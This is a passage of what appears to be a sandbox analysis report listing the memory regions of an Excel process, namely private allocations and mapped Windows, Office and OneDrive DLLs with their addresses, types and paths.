entry_point = 0x0
region_type = private
name = "private_0x0000000006ee0000"
filename = ""
Region:
id = 399
start_va = 0x76e0000
end_va = 0x7ae0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 400
start_va = 0x7af0000
end_va = 0x7ef0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007af0000"
filename = ""
Region:
id = 401
start_va = 0x7f00000
end_va = 0x8300fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007f00000"
filename = ""
Region:
id = 402
start_va = 0x8310000
end_va = 0x850ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008310000"
filename = ""
Region:
id = 403
start_va = 0x8510000
end_va = 0x89cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 404
start_va = 0x89d0000
end_va = 0x8dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089d0000"
filename = ""
Region:
id = 405
start_va = 0x8e70000
end_va = 0x8f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e70000"
filename = ""
Region:
id = 406
start_va = 0x8f90000
end_va = 0x908ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f90000"
filename = ""
Region:
id = 407
start_va = 0x9090000
end_va = 0x918ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009090000"
filename = ""
Region:
id = 408
start_va = 0x91e0000
end_va = 0x925ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091e0000"
filename = ""
Region:
id = 409
start_va = 0x92c0000
end_va = 0x92cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000092c0000"
filename = ""
Region:
id = 410
start_va = 0x92d0000
end_va = 0x93cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000092d0000"
filename = ""
Region:
id = 411
start_va = 0x93d0000
end_va = 0x9588fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 412
start_va = 0x9590000
end_va = 0x9d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009590000"
filename = ""
Region:
id = 413
start_va = 0x9eb0000
end_va = 0x9f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009eb0000"
filename = ""
Region:
id = 414
start_va = 0x9f30000
end_va = 0xa2b9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 415
start_va = 0xa410000
end_va = 0xa50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 416
start_va = 0xa5c0000
end_va = 0xa6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a5c0000"
filename = ""
Region:
id = 417
start_va = 0xa820000
end_va = 0xa89ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a820000"
filename = ""
Region:
id = 418
start_va = 0xa900000
end_va = 0xa9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a900000"
filename = ""
Region:
id = 419
start_va = 0xaae0000
end_va = 0xabdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aae0000"
filename = ""
Region:
id = 420
start_va = 0xac20000
end_va = 0xad1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ac20000"
filename = ""
Region:
id = 421
start_va = 0xad20000
end_va = 0xaf1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad20000"
filename = ""
Region:
id = 422
start_va = 0x37790000
end_va = 0x3779ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000037790000"
filename = ""
Region:
id = 423
start_va = 0x72d10000
end_va = 0x72d42fff
monitored = 0
entry_point = 0x72d11a80
region_type = mapped_file
name = "osppc.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")
Region:
id = 424
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 425
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 426
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 427
start_va = 0x77a40000
end_va = 0x77a42fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 428
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 429
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 430
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 431
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 432
start_va = 0x13f3f0000
end_va = 0x1414d0fff
monitored = 0
entry_point = 0x13f3f3830
region_type = mapped_file
name = "excel.exe"
filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe")
Region:
id = 433
start_va = 0x7febe060000
end_va = 0x7febe06ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007febe060000"
filename = ""
Region:
id = 434
start_va = 0x7fee76d0000
end_va = 0x7fee776ffff
monitored = 0
entry_point = 0x7fee774eb20
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll")
Region:
id = 435
start_va = 0x7fee7770000
end_va = 0x7fee8268fff
monitored = 0
entry_point = 0x7fee7827a3c
region_type = mapped_file
name = "chart.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll")
Region:
id = 436
start_va = 0x7fee8270000
end_va = 0x7fee8492fff
monitored = 0
entry_point = 0x7fee8272bf0
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll")
Region:
id = 437
start_va = 0x7fee84a0000
end_va = 0x7fee8548fff
monitored = 0
entry_point = 0x7fee84a1010
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 438
start_va = 0x7fee8550000
end_va = 0x7fee86cdfff
monitored = 0
entry_point = 0x7fee86567fc
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 439
start_va = 0x7fee86d0000
end_va = 0x7fee884afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 440
start_va = 0x7fee8850000
end_va = 0x7fee8915fff
monitored = 0
entry_point = 0x7fee88b0f3c
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 441
start_va = 0x7fee8920000
end_va = 0x7fee8aeffff
monitored = 0
entry_point = 0x7fee8aaef5c
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 442
start_va = 0x7fee8af0000
end_va = 0x7feed92efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll")
Region:
id = 443
start_va = 0x7feed930000
end_va = 0x7feee250fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 444
start_va = 0x7feee260000
end_va = 0x7feee567fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 445
start_va = 0x7feee570000
end_va = 0x7feee651fff
monitored = 0
entry_point = 0x7feee5ed90c
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 446
start_va = 0x7feee660000
end_va = 0x7feef93bfff
monitored = 0
entry_point = 0x7feee66caf0
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll")
Region:
id = 447
start_va = 0x7feef940000
end_va = 0x7fef010bfff
monitored = 0
entry_point = 0x7feef9d5f94
region_type = mapped_file
name = "mso99lwin32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll")
Region:
id = 448
start_va = 0x7fef0110000
end_va = 0x7fef09fafff
monitored = 0
entry_point = 0x7fef0215a48
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 449
start_va = 0x7fef0a00000
end_va = 0x7fef0e77fff
monitored = 0
entry_point = 0x7fef0a79154
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 450
start_va = 0x7fef0e80000
end_va = 0x7fef1183fff
monitored = 0
entry_point = 0x7fef0f26094
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 451
start_va = 0x7fef1190000
end_va = 0x7fef22fbfff
monitored = 0
entry_point = 0x7fef11953f0
region_type = mapped_file
name = "oart.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll")
Region:
id = 452
start_va = 0x7fef2300000
end_va = 0x7fef23c5fff
monitored = 0
entry_point = 0x7fef230f220
region_type = mapped_file
name = "msftedit.dll"
filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")
Region:
id = 453
start_va = 0x7fef26f0000
end_va = 0x7fef27c6fff
monitored = 0
entry_point = 0x7fef26f1074
region_type = mapped_file
name = "searchfolder.dll"
filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll")
Region:
id = 454
start_va = 0x7fef27d0000
end_va = 0x7fef283efff
monitored = 0
entry_point = 0x7fef27d1134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 455
start_va = 0x7fef2840000
end_va = 0x7fef2866fff
monitored = 0
entry_point = 0x7fef284e06c
region_type = mapped_file
name = "sppc.dll"
filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll")
Region:
id = 456
start_va = 0x7fef2a80000
end_va = 0x7fef2cd1fff
monitored = 0
entry_point = 0x7fef2ac766c
region_type = mapped_file
name = "wxpnse.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\wxpnse.dll")
Region:
id = 457
start_va = 0x7fef4850000
end_va = 0x7fef488afff
monitored = 0
entry_point = 0x7fef4851238
region_type = mapped_file
name = "mlang.dll"
filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll")
Region:
id = 458
start_va = 0x7fef4890000
end_va = 0x7fef48aefff
monitored = 0
entry_point = 0x7fef48957b8
region_type = mapped_file
name = "thumbcache.dll"
filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll")
Region:
id = 459
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 460
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 461
start_va = 0x7fef71b0000
end_va = 0x7fef722efff
monitored = 0
entry_point = 0x7fef720385c
region_type = mapped_file
name = "tiptsf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")
Region:
id = 462
start_va = 0x7fef7230000
end_va = 0x7fef726afff
monitored = 0
entry_point = 0x7fef7231070
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 463
start_va = 0x7fef7270000
end_va = 0x7fef727efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl30.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 464
start_va = 0x7fef7280000
end_va = 0x7fef7286fff
monitored = 0
entry_point = 0x7fef7281010
region_type = mapped_file
name = "msimg32.dll"
filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll")
Region:
id = 465
start_va = 0x7fef7290000
end_va = 0x7fef7294fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 466
start_va = 0x7fef72c0000
end_va = 0x7fef733afff
monitored = 0
entry_point = 0x7fef732bf74
region_type = mapped_file
name = "structuredquery.dll"
filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll")
Region:
id = 467
start_va = 0x7fef7600000
end_va = 0x7fef760bfff
monitored = 0
entry_point = 0x7fef7601380
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 468
start_va = 0x7fef7610000
end_va = 0x7fef7643fff
monitored = 0
entry_point = 0x7fef7611890
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")
Region:
id = 469
start_va = 0x7fef7ac0000
end_va = 0x7fef7b3ffff
monitored = 0
entry_point = 0x7fef7ac4a8c
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 470
start_va = 0x7fef7b40000
end_va = 0x7fef7b4bfff
monitored = 0
entry_point = 0x7fef7b41070
region_type = mapped_file
name = "cscdll.dll"
filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll")
Region:
id = 471
start_va = 0x7fef7b50000
end_va = 0x7fef7bcdfff
monitored = 0
entry_point = 0x7fef7b51304
region_type = mapped_file
name = "cscui.dll"
filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll")
Region:
id = 472
start_va = 0x7fef7bd0000
end_va = 0x7fef7c04fff
monitored = 0
entry_point = 0x7fef7bdc59c
region_type = mapped_file
name = "ehstorshell.dll"
filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")
Region:
id = 473
start_va = 0x7fef7c10000
end_va = 0x7fef848dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "grooveintlresource.dll"
filename = "\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll")
Region:
id = 474
start_va = 0x7fef8490000
end_va = 0x7fef8648fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 475
start_va = 0x7fef8650000
end_va = 0x7fef8965fff
monitored = 0
entry_point = 0x7fef8653e98
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 476
start_va = 0x7fef8970000
end_va = 0x7fef8972fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 477
start_va = 0x7fef8980000
end_va = 0x7fef8984fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 478
start_va = 0x7fef8990000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 479
start_va = 0x7fef89a0000
end_va = 0x7fef89a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 480
start_va = 0x7fef89b0000
end_va = 0x7fef89b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 481
start_va = 0x7fef89c0000
end_va = 0x7fef89c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 482
start_va = 0x7fef89d0000
end_va = 0x7fef89dbfff
monitored = 0
entry_point = 0x7fef89d4150
region_type = mapped_file
name = "vcruntime140_1.dll"
filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll")
Region:
id = 483
start_va = 0x7fef89e0000
end_va = 0x7fef8a70fff
monitored = 0
entry_point = 0x7fef8a32430
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")
Region:
id = 484
start_va = 0x7fef8a80000
end_va = 0x7fef8a83fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 485
start_va = 0x7fef8a90000
end_va = 0x7fef8a93fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 486
start_va = 0x7fef8aa0000
end_va = 0x7fef8aa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 487
start_va = 0x7fef8ab0000
end_va = 0x7fef8ab2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 488
start_va = 0x7fef8ac0000
end_va = 0x7fef8ac2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 489
start_va = 0x7fef8ad0000
end_va = 0x7fef8ad2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 490
start_va = 0x7fef8ae0000
end_va = 0x7fef8ae2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 491
start_va = 0x7fef8af0000
end_va = 0x7fef8af2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 492
start_va = 0x7fef8b00000
end_va = 0x7fef8b02fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 493
start_va = 0x7fef8b10000
end_va = 0x7fef8c01fff
monitored = 0
entry_point = 0x7fef8b19060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 494
start_va = 0x7fef8c10000
end_va = 0x7fef8c13fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 495
start_va = 0x7fef8c20000
end_va = 0x7fef8c38fff
monitored = 0
entry_point = 0x7fef8c2ee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 496
start_va = 0x7fef8c40000
end_va = 0x7fef8e53fff
monitored = 0
entry_point = 0x7fef8c41000
region_type = mapped_file
name = "grooveex.dll"
filename = "\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll")
Region:
id = 497
start_va = 0x7fef8e60000
end_va = 0x7fef8f2dfff
monitored = 0
entry_point = 0x7fef8e830fc
region_type = mapped_file
name = "msvcr110.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll")
Region:
id = 498
start_va = 0x7fef8f30000
end_va = 0x7fef8fd6fff
monitored = 0
entry_point = 0x7fef8f7b93c
region_type = mapped_file
name = "msvcp110.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll")
Region:
id = 499
start_va = 0x7fef8fe0000
end_va = 0x7fef9035fff
monitored = 0
entry_point = 0x7fef8fe86e8
region_type = mapped_file
name = "filesyncshell64.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll")
Region:
id = 500
start_va = 0x7fef9040000
end_va = 0x7fef9209fff
monitored = 0
entry_point = 0x7fef9047a60
region_type = mapped_file
name = "explorerframe.dll"
filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")
Region:
id = 501
start_va = 0x7fef9260000
end_va = 0x7fef9262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 502
start_va = 0x7fef9580000
end_va = 0x7fef958bfff
monitored = 0
entry_point = 0x7fef958602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 503
start_va = 0x7fef9590000
end_va = 0x7fef9603fff
monitored = 0
entry_point = 0x7fef95966f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 504
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 505
start_va = 0x7fefae00000
end_va = 0x7fefaea6fff
monitored = 0
entry_point = 0x7fefae1050c
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 506
start_va = 0x7fefaeb0000
end_va = 0x7fefaf04fff
monitored = 0
entry_point = 0x7fefaee6b20
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")
Region:
id = 507
start_va = 0x7fefaf10000
end_va = 0x7fefaf43fff
monitored = 0
entry_point = 0x7fefaf37cac
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")
Region:
id = 508
